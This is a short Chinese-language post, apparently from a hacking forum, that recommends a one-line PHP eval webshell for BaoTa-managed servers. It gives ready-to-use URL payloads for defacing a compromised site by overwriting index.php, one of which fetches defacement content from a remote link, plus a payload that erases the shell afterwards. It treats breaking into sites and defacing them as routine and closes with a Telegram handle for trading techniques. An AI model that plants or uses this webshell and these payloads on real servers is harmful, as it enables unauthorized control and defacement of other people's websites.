个人推荐webshell

<?php @eval($_GET["cmd"]); ?>

死稳的一句话，也是个基础WebShell，但是适用于宝塔之类的禁用了系统函数的环境，后面我会进行演示。
当你通过自己的方法把这个shell上传了上去之后，不用菜刀，所有操作均在浏览器进行,(这个WebShell的操作全部为php代码，宝塔默认禁用php调用linux命令的函数，如exec)

1.挂黑

挂黑肯定是各位拿站之后必干的事，这里提供操作
访问

您的域名/您的文件名.php?cmd=$myfile = fopen("index.php", "w") or die("Unable to open file!");$txt = "黑页内容";fwrite($myfile, $txt);fclose($myfile);

如果您的html过长，可以尝试使用下载方法
访问

您的域名/您的文件名.php?cmd=file_put_contents("index.php",file_get_contents("您的黑页链接"));

为什么上面文件名不用html呢？因为html在大部分使用宝塔的服务器上的优先级低于php，如果您需要也可以使用html

2.删除自身

如果您是一位白帽，留了黑页也该走了,访问

您的域名/您的文件名.php?cmd=$myfile = fopen("文件名", "w") or die("Unable to open file!");$txt = "";fwrite($myfile, $txt);fclose($myfile);

即可一键自宫（雾
当然，还有其他玩法，如用php列举文件，进行网站压测等玩法就不一一列举了，当然，欢迎各位加我Tg交流技术
tg id:@given_huang